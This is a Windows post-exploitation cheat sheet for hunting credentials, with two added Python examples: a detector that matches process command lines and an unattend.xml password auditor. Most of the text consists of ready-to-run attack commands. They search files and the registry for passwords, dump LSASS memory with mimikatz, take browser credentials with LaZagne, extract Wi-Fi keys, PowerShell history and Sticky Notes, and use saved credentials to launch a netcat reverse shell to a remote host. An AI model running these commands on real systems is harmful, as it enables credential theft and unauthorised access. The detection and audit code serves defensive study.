FILE SEARCHING COMMANDS
- Search for potentially risky files in the current directory and its subdirectories:
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* == *user*
- Search XML files recursively for cleartext credentials (the cpassword attribute):
gci * -Include *.xml -Recurse -EA SilentlyContinue | select-string cpassword
- Search for IIS web.config files:
Get-ChildItem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
- Find files containing "password" across common configuration file types:
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.ps1 *.bat *.zip
- Hunt for SAM and SYSTEM backups (start from the root of the system drive):
cd /d C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK
- Use tools like winPEAS to search for files containing credentials:
.\winPEASany.exe quiet cmd searchfast filesinfo
SEARCHING FOR CREDENTIALS IN THE REGISTRY
- Search for passwords in HKEY_LOCAL_MACHINE (HKLM):
reg query HKLM /f password /t REG_SZ /s
- Search for passwords in HKEY_CURRENT_USER (HKCU):
reg query HKCU /f password /t REG_SZ /s
- Retrieve proxy credentials saved in PuTTY sessions:
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions /f "Proxy" /s
SAVED WINDOWS CREDENTIALS
Windows provides the functionality to use and save other users' credentials. The following commands help list and use these saved credentials:
- Automatically Identify Saved Credentials with winPEAS:
.\winPEASx64.exe quiet cmd windowscreds
- Check AutoLogon Credentials in registry:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
- Extract plaintext passwords from memory using mimikatz:
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
- Manually List Saved Credentials:
cmdkey /list
- Run Command with Saved Credentials:
runas /savecred /user:admin cmd.exe
- Prepare to Receive a Reverse Shell with Netcat:
nc -lvnp 1337
- Execute commands using saved credentials for a reverse shell:
runas /env /noprofile /savecred /user:DESKTOP-T3I4BBK\administrator "c:\temp\nc.exe [IP-ADDRESS] 1337 -e cmd.exe"
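From the detection side, every command in the file-search, registry and saved-credential sections above leaves a process-creation record. The following added example (not part of the original page) matches constructed command lines against patterns derived from those commands and ranks each user's activity; the event shape, rule names and severities are assumptions.

```python
import re

# Constructed sample events shaped like Windows process-creation records
# (the CommandLine field of Security 4688 / Sysmon Event ID 1). Not real telemetry.
SAMPLE_EVENTS = [
    {"id": 1, "user": "CORP\\jdoe", "cmd": 'reg query HKLM /f password /t REG_SZ /s'},
    {"id": 2, "user": "CORP\\jdoe", "cmd": 'findstr /SIM /C:"password" *.txt *.ini *.config'},
    {"id": 3, "user": "CORP\\svc",  "cmd": 'runas /savecred /user:admin cmd.exe'},
    {"id": 4, "user": "CORP\\jdoe", "cmd": 'cmdkey /list'},
    {"id": 5, "user": "CORP\\jdoe", "cmd": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"'},
    {"id": 6, "user": "CORP\\jdoe", "cmd": 'netsh wlan show profile CorpWifi key=clear'},
    {"id": 7, "user": "CORP\\jdoe", "cmd": 'reg query "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\winlogon"'},
    {"id": 8, "user": "CORP\\jdoe", "cmd": 'notepad.exe C:\\temp\\notes.txt'},
]

# (rule name, pattern, severity). Patterns mirror the cheat-sheet commands above;
# case-insensitive because cmd.exe and PowerShell are. Severities are assumptions.
RULES = [
    ("registry_password_search", r"\breg(\.exe)?\s+query\b.*\s/f\s+password\b", "medium"),
    ("winlogon_autologon_query", r"\breg(\.exe)?\s+query\b.*currentversion\\winlogon", "medium"),
    ("filesystem_password_grep", r"\bfindstr(\.exe)?\b.*\bpassword\b", "low"),
    ("runas_savecred", r"\brunas(\.exe)?\b.*\s/savecred\b", "high"),
    ("cmdkey_list", r"\bcmdkey(\.exe)?\s+/list\b", "low"),
    ("lsass_credential_dump", r"sekurlsa::logonpasswords", "critical"),
    ("wlan_key_clear", r"\bnetsh(\.exe)?\s+wlan\s+show\s+profiles?\b.*\bkey=clear\b", "medium"),
]
COMPILED = [(name, re.compile(rx, re.I), sev) for name, rx, sev in RULES]
SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2, "critical": 3}

def classify(cmdline):
    """Return every (rule_name, severity) whose pattern matches one command line."""
    return [(name, sev) for name, rx, sev in COMPILED if rx.search(cmdline)]

def triage(events):
    """Group hits per user: {user: [(event_id, rule_name, severity), ...]}."""
    hits = {}
    for ev in events:
        for name, sev in classify(ev["cmd"]):
            hits.setdefault(ev["user"], []).append((ev["id"], name, sev))
    return hits

def highest_severity(user_hits):
    """Worst severity seen for one user, or None if the user had no hits."""
    return max((h[2] for h in user_hits), key=SEVERITY_ORDER.get, default=None)

if __name__ == "__main__":
    for user, user_hits in triage(SAMPLE_EVENTS).items():
        print(f"{user}: {len(user_hits)} hit(s), worst={highest_severity(user_hits)}")
```

A single hit on the low rules is routine admin activity; the value is in the per-user grouping, where several of these commands in one session stand out.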
POWERSHELL HISTORY FILE
- Locate PowerShell History File:
(Get-PSReadLineOption).HistorySavePath
- Read Contents of PowerShell History File:
gc (Get-PSReadLineOption).HistorySavePath
- Retrieve PowerShell History Files for All Users:
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
BROWSER CREDENTIALS
- Extract browser credentials using LaZagne:
lazagne.exe browsers
- Search the Chrome custom dictionary for entries containing "password":
gc 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
POWERSHELL CREDENTIALS
- Import credentials from an XML file (the password inside is a DPAPI-protected SecureString, so it only decrypts when run as the user who exported it, on the same machine):
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'
- Retrieve the username from the imported credentials:
$credential.GetNetworkCredential().Username
- Retrieve the password from the imported credentials:
$credential.GetNetworkCredential().Password
- Complete example to decrypt and display the username and password:
$credential = Import-Clixml -Path 'C:\scripts\pass.xml'; $credential.GetNetworkCredential().Username; $credential.GetNetworkCredential().Password
STICKY NOTES PASSWORDS
- Locate the Sticky Notes database files:
ls C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState
- Set the execution policy to Bypass for the current process:
PS C:\> Set-ExecutionPolicy Bypass -Scope Process
- Change directory to where PSSQLite is located:
PS C:\> cd .\PSSQLite\
- Import the PSSQLite module:
PS C:\PSSQLite> Import-Module .\PSSQLite.psd1
- Define the path to the Sticky Notes database file:
PS C:\PSSQLite> $db = 'C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
- Query the database to retrieve the text of the notes:
PS C:\PSSQLite> Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | Format-Table -Wrap
- Extract and view the contents of the database write-ahead log with the strings command:
strings 'C:\Users\[USER]\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite-wal'
WIFI PASSWORDS
- View the list of all saved wireless profiles:
PS C:\> netsh wlan show profile
- Retrieve the key for a specific wireless profile:
PS C:\> netsh wlan show profile [PROFILE-NAME] key=clear
- One-liner (cmd.exe) that extracts the key of every saved wireless profile:
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
UNATTEND.XML
When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows a single operating system image to be deployed to several hosts over the network. These installations are referred to as unattended installations because they require no user interaction. They do require an administrator account for the initial setup, and those credentials may be left behind on the machine in the following locations:
MANUALLY
- C:\Unattend.xml
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Unattend\Unattend.xml
- C:\Windows\System32\sysprep.inf
- C:\Windows\System32\sysprep\sysprep.xml
AUTOMATICALLY
- Perform a detailed search for unattended and sysprep files:
Get-ChildItem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue
- Search for specific log and configuration files:
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
- Search for the term 'password' in all files:
findstr /spin "password" *.*
- Open the Unattend.xml file with a text editor to review its content:
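A defender-side check for that review step, as an added example that is not part of the original page: it parses an answer file in the urn:schemas-microsoft-com:unattend namespace and reports each password element that still holds a value, without decoding or returning it, so a leftover file can be scrubbed or removed. The sample file is constructed with placeholder values; the *SENSITIVE*DATA*DELETED* marker is the value Setup writes once it has consumed a password, and treating a missing PlainText element as plaintext is an assumption.

```python
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"
SCRUBBED = "*SENSITIVE*DATA*DELETED*"   # marker Setup leaves once it has consumed a password

# Constructed answer-file fragment with placeholder values (not real credentials); the
# AutoLogon value is base64 of UTF-16LE text, since PlainText=false means encoded, not encrypted.
SAMPLE_UNATTEND = f"""<unattend xmlns="{NS}">
  <component name="Microsoft-Windows-Shell-Setup">
    <AutoLogon>
      <Password>
        <Value>UABsAGEAYwBlAGgAbwBsAGQAZQByAFAAYQBzAHMAdwBvAHIAZAA=</Value>
        <PlainText>false</PlainText>
      </Password>
    </AutoLogon>
    <UserAccounts>
      <AdministratorPassword>
        <Value>PLACEHOLDER-SECRET</Value>
        <PlainText>true</PlainText>
      </AdministratorPassword>
    </UserAccounts>
  </component>
</unattend>"""

def looks_base64(value):
    """True if the value decodes as strict base64, the non-plaintext answer-file form."""
    try:
        base64.b64decode(value, validate=True)
        return True
    except ValueError:      # binascii.Error is a ValueError subclass
        return False

def audit_unattend(xml_text):
    """One finding per password element still carrying a value; values are never decoded."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        tag = elem.tag.split("}")[-1]                  # drop the namespace prefix
        if tag not in ("Password", "AdministratorPassword"):
            continue
        value = (elem.findtext(f"{{{NS}}}Value") or "").strip()
        if not value or value == SCRUBBED:
            continue                                    # empty or already scrubbed
        # a missing <PlainText> is treated as plaintext here (an assumption, flag it anyway)
        plain = (elem.findtext(f"{{{NS}}}PlainText") or "true").strip().lower() == "true"
        findings.append({"section": parent_of[elem].tag.split("}")[-1], "element": tag,
                         "plaintext": plain, "base64": (not plain) and looks_base64(value)})
    return findings
```

Run it over every file the searches above turn up; any finding, plaintext or base64, means the file still carries recoverable credential material.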